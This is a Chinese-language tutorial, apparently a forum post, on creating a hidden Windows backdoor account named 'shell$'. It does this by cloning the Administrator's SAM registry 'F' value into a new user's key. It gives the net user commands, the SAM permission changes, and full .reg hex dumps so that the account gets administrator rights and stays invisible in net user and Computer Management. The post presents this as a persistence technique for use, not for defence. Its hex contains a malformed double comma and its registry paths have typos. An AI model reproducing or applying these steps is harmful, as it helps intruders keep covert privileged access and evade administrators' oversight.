windows隐藏用户

先建立 shell$ 用户

c:\\>net user shell$ chaom=- /add 注：不要再用命令把这个帐户加到Administrators组去。

//后面加$ 是为了使在 控制台下用 net user 看不到.

然后运行regedt32.exe(注意不是regedit.exe)

先找到HKEY_LOCAL_MAICHINE\\SAM\\SAM 点击它右键 ,然后在菜单\"安全\"->\"权限\" 添加自己现在登录的帐户或组,

把\"权限\"->\"完全控制\"->\"允许\"打上勾,然后确定.

这样就可以直接读取本地sam的信息

现在运行regedit.exe

打开键 HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\names\\shell$

查看默认键值为\"0x636\" 相应导出如下

HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\names\\shell$ 为shell$.reg

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\ 为 0x636.reg (shell$的相应键)

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\ 为 lf4.reg (Administrators的相应键)

用记事本打开lf4.reg 找到如下的\"F\"的值,比如这个例子中如下

\"F\"=hex:02,00,01,00,00,00,00,00,9a,6c,c3,6a,a6,10,c7,01,00,00,00,00,00,00,00,\\ 00,12,f5,50,2a,d5,ee,c6,01,00,00,00,00,00,00,00,00,ea,c7,75,84,a2,10,c7,01,\\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,30,02,01,00,00,00,00,\\ 00,00,00,00,00,00,00

把其复制后,打开0x636.reg,找到\"F\"的值,将其删除,然后把上面的那段粘贴.

打开shell$.reg,把里面的内容,比如这个例子中如下面这段复制

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\shell$] @=hex(636):

回到0x636.reg 粘贴上面这段到文件最后,最后生成的文件内容如下 Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\00000636]

\"F\"=hex:02,00,01,00,00,00,00,00,9a,6c,c3,6a,a6,10,c7,01,00,00,00,00,00,00,00,\\ 00,12,f5,50,2a,d5,ee,c6,01,00,00,00,00,00,00,00,00,ea,c7,75,84,a2,10,c7,01,\\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,30,02,01,00,00,00,00,\\ 00,00,00,00,00,00,00

\"V\"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,0c,00,00,00,00,00,00,\\ 00,e0,00,00,00,00,00,00,00,00,00,00,00,e0,00,00,00,00,00,00,00,00,00,00,00,\\ e0,00,00,00,00,00,00,00,00,00,00,00,e0,00,00,00,00,00,00,00,00,00,00,00,e0,\\ 00,00,00,00,00,00,00,00,00,00,00,e0,00,00,00,00,00,00,00,00,00,00,00,e0,00,\\ 00,00,00,00,00,00,00,00,00,00,e0,00,00,00,00,00,00,00,00,00,00,00,e0,00,00,\\ 00,00,00,00,00,00,00,00,00,e0,00,00,00,00,00,00,00,00,00,00,00,e0,00,00,00,\\ 08,00,00,00,01,00,00,00,e8,00,00,00,14,00,00,00,00,00,00,00,fc,00,00,00,14,\\ 00,00,00,00,00,00,00,10,01,00,00,14,00,00,00,00,00,00,00,24,01,00,00,14,00,\\ 00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\\ 00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\\ 00,00,00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\\ 00,70,00,04,00,00,00,00,00,14,00,5b,03,02,00,01,01,00,00,00,00,00,01,00,00,\\ 00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\\ 00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\\ 00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,66,a6,3e,d6,7e,\\ 9b,85,1d,c3,82,76,5d,36,06,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\\ 00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,00,68,00,65,00,6c,\\ 00,6c,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,5d,90,9e,8c,1b,57,97,c1,\\ c2,6e,5a,3e,18,9c,00,38,01,00,01,00,7c,e8,a2,c7,c8,af,7c,fd,44,fa,44,a5,72,\\ b7,75,4f,01,00,01,00,,81,94,f3,ed,f5,6d,ea,68,39,66,99,67,4d,95,43,01,00,\\ 01,00,b6,4b,9d,a2,67,fc,86,6f,9d,a5,fd,cf,d3,19,ee,9b

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\shell$] @=hex(636):

保存后,将shell$用户删除

c:\\>net user shell$ /delete

运行regedit.exe 将我们已经修改好的0x636.reg文件导入.

最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\\SAM\\SAM 点击它 ,然后在菜单\"安全\"->\"权限\" 删除刚才添加的帐号

然后 注销当前用户 用 shell$/chaom=- 登陆 就会是 最高权限了.

03克隆的方法和 2000的克隆 略有点区别 就是我文章的那前一部分.

这样就建立了一个在控制台用 net user 和\"计算机管理\"中都看不到的帐户shell$, 记着第一次就把密码设置好,不要改密码.否则会失效.

刚才密码输错了 现在大家看看 看到没？好了 到这里结束88